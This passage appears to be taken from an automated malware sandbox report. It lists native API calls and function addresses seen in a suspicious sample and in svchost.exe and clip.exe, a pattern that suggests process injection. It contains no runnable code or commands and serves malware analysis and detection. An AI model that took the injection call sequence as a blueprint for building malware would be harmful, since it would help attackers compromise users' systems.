            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03474650 NtSuspendThread,6_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472BE0 NtQueryValueKey,6_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472BF0 NtAllocateVirtualMemory,6_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472B80 NtQueryInformationFile,6_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472BA0 NtEnumerateValueKey,6_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472AD0 NtReadFile,6_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472AF0 NtWriteFile,6_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472AB0 NtWaitForSingleObject,6_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472F60 NtCreateProcessEx,6_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472F30 NtCreateSection,6_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472FE0 NtCreateFile,6_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472F90 NtProtectVirtualMemory,6_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472FA0 NtQuerySection,6_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472FB0 NtResumeThread,6_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472E30 NtWriteVirtualMemory,6_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472EE0 NtQueueApcThread,6_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472E80 NtReadVirtualMemory,6_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472EA0 NtAdjustPrivilegesToken,6_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472D00 NtSetInformationFile,6_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472D10 NtMapViewOfSection,6_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472D30 NtUnmapViewOfSection,6_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472DD0 NtDelayExecution,6_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472DB0 NtEnumerateKey,6_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472C60 NtCreateKey,6_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472C00 NtQueryInformationProcess,6_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472CC0 NtQueryVirtualMemory,6_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472CF0 NtOpenProcess,6_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03472CA0 NtQueryInformationToken,6_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03473010 NtOpenDirectoryObject,6_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03473090 NtSetValueKey,6_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034739B0 NtGetContextThread,6_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03473D70 NtOpenThread,6_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03473D10 NtOpenProcessToken,6_2_03473D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A14650 NtSuspendThread,LdrInitializeThunk,9_2_04A14650
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A14340 NtSetContextThread,LdrInitializeThunk,9_2_04A14340
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12CA0 NtQueryInformationToken,LdrInitializeThunk,9_2_04A12CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12C60 NtCreateKey,LdrInitializeThunk,9_2_04A12C60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_04A12C70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_04A12DF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12DD0 NtDelayExecution,LdrInitializeThunk,9_2_04A12DD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12D30 NtUnmapViewOfSection,LdrInitializeThunk,9_2_04A12D30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12D10 NtMapViewOfSection,LdrInitializeThunk,9_2_04A12D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12E80 NtReadVirtualMemory,LdrInitializeThunk,9_2_04A12E80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12EE0 NtQueueApcThread,LdrInitializeThunk,9_2_04A12EE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12FB0 NtResumeThread,LdrInitializeThunk,9_2_04A12FB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12FE0 NtCreateFile,LdrInitializeThunk,9_2_04A12FE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12F30 NtCreateSection,LdrInitializeThunk,9_2_04A12F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12AF0 NtWriteFile,LdrInitializeThunk,9_2_04A12AF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12AD0 NtReadFile,LdrInitializeThunk,9_2_04A12AD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12BA0 NtEnumerateValueKey,LdrInitializeThunk,9_2_04A12BA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12BE0 NtQueryValueKey,LdrInitializeThunk,9_2_04A12BE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12BF0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_04A12BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12B60 NtClose,LdrInitializeThunk,9_2_04A12B60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A135C0 NtCreateMutant,LdrInitializeThunk,9_2_04A135C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A139B0 NtGetContextThread,LdrInitializeThunk,9_2_04A139B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12CF0 NtOpenProcess,9_2_04A12CF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12CC0 NtQueryVirtualMemory,9_2_04A12CC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12C00 NtQueryInformationProcess,9_2_04A12C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12DB0 NtEnumerateKey,9_2_04A12DB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12D00 NtSetInformationFile,9_2_04A12D00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12EA0 NtAdjustPrivilegesToken,9_2_04A12EA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12E30 NtWriteVirtualMemory,9_2_04A12E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12FA0 NtQuerySection,9_2_04A12FA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12F90 NtProtectVirtualMemory,9_2_04A12F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12F60 NtCreateProcessEx,9_2_04A12F60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12AB0 NtWaitForSingleObject,9_2_04A12AB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A12B80 NtQueryInformationFile,9_2_04A12B80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A13090 NtSetValueKey,9_2_04A13090
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A13010 NtOpenDirectoryObject,9_2_04A13010
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A13D10 NtOpenProcessToken,9_2_04A13D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A13D70 NtOpenThread,9_2_04A13D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A37B40 NtCreateFile,9_2_02A37B40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A37E30 NtClose,9_2_02A37E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A37F90 NtAllocateVirtualMemory,9_2_02A37F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A37CA0 NtReadFile,9_2_02A37CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_02A37D90 NtDeleteFile,9_2_02A37D90
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E740B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,4_2_00E740B1
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E68858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,4_2_00E68858
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E7545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,4_2_00E7545F
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E1E8004_2_00E1E800
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E3DBB54_2_00E3DBB5
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E1E0604_2_00E1E060
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E9804A4_2_00E9804A
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E241404_2_00E24140
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E324054_2_00E32405
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E465224_2_00E46522
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E906654_2_00E90665
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E4267E4_2_00E4267E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E268434_2_00E26843
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E3283A4_2_00E3283A
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E489DF4_2_00E489DF
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E90AE24_2_00E90AE2
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E46A944_2_00E46A94
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E28A0E4_2_00E28A0E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E6EB074_2_00E6EB07
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E78B134_2_00E78B13
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E3CD614_2_00E3CD61
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E470064_2_00E47006
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E231904_2_00E23190
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E2710E4_2_00E2710E
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E112874_2_00E11287
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E333C74_2_00E333C7
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E3F4194_2_00E3F419
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E316C44_2_00E316C4
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E256804_2_00E25680
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E258C04_2_00E258C0
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E378D34_2_00E378D3
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E31BB84_2_00E31BB8
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E49D054_2_00E49D05
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E1FE404_2_00E1FE40
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E3BFE64_2_00E3BFE6
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00E31FD04_2_00E31FD0
            Source: C:\Users\user\Desktop\TOgpmvvWoj.exeCode function: 4_2_00D435E04_2_00D435E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004011C06_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004021A56_2_004021A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004021B06_2_004021B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040FACB6_2_0040FACB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040FAD36_2_0040FAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004023206_2_00402320
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004023BC6_2_004023BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0042D4436_2_0042D443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004164336_2_00416433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040FCF36_2_0040FCF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040DD736_2_0040DD73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00402F506_2_00402F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FA3526_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344E3F06_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_035003E66_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E02746_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C02C06_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034C81586_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034301006_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DA1186_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F81CC6_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F41A26_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_035001AA6_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D20006_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034647506_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034407706_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343C7C06_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345C6E06_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034405356_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_035005916_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F24466_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E44206_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EE4F66_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FAB406_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F6BD76_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343EA806_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034569626_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034429A06_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0350A9A66_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344A8406_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034428406_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0346E8F06_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034268B86_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B4F406_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03482F286_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03460F306_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E2F306_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03432FC86_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344CFE06_2_0344CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034BEFA06_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440E596_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FEE266_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FEEDB6_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03452E906_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FCE936_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344AD006_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DCD1F6_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0343ADE06_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03458DBF6_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03440C006_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03430CF26_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E0CB56_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342D34C6_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F132D6_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0348739A6_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345B2C06_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E12ED6_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034452A06_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347516C6_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0342F1726_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0350B16B6_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0344B1B06_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EF0CC6_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034470C06_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F70E96_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FF0E06_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FF7B06_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034856306_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F16CC6_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F75716_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_035095C36_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DD5B06_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034314606_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FF43F6_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FFB766_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B5BF06_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0347DBF96_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345FB806_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FFA496_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F7A466_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B3A6C6_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034EDAC66_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034DDAAC6_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03485AA06_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034E1AA36_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034499506_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345B9506_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034D59106_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034AD8006_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034438E06_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FFF096_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03403FD26_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03403FD56_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03441F926_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FFFB16_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03449EB06_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_03443D406_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F1D5A6_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034F7D736_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0345FDC06_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034B9C326_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_034FFCF26_2_034FFCF2
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_0329FB0A8_2_0329FB0A
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_0329FB128_2_0329FB12
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_0329FD328_2_0329FD32
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_0329DDB28_2_0329DDB2
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032A64728_2_032A6472
            Source: C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exeCode function: 8_2_032BD4828_2_032BD482
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A8E4F69_2_04A8E4F6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A844209_2_04A84420
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A924469_2_04A92446
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04AA05919_2_04AA0591
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E05359_2_049E0535
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049FC6E09_2_049FC6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049DC7C09_2_049DC7C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E07709_2_049E0770
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A047509_2_04A04750
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A720009_2_04A72000
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04AA01AA9_2_04AA01AA
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A941A29_2_04A941A2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A981CC9_2_04A981CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049D01009_2_049D0100
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A7A1189_2_04A7A118
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A681589_2_04A68158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A602C09_2_04A602C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A802749_2_04A80274
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04AA03E69_2_04AA03E6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049EE3F09_2_049EE3F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9A3529_2_04A9A352
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A80CB59_2_04A80CB5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049D0CF29_2_049D0CF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E0C009_2_049E0C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049F8DBF9_2_049F8DBF
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049DADE09_2_049DADE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049EAD009_2_049EAD00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A7CD1F9_2_04A7CD1F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049F2E909_2_049F2E90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9CE939_2_04A9CE93
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9EEDB9_2_04A9EEDB
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A9EE269_2_04A9EE26
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E0E599_2_049E0E59
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A5EFA09_2_04A5EFA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049D2FC89_2_049D2FC8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049ECFE09_2_049ECFE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A22F289_2_04A22F28
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A00F309_2_04A00F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A82F309_2_04A82F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A54F409_2_04A54F40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049C68B89_2_049C68B8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04A0E8F09_2_04A0E8F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E28409_2_049E2840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049EA8409_2_049EA840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_04AAA9A69_2_04AAA9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049E29A09_2_049E29A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049F69629_2_049F6962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 9_2_049DEA809_2_049DEA80
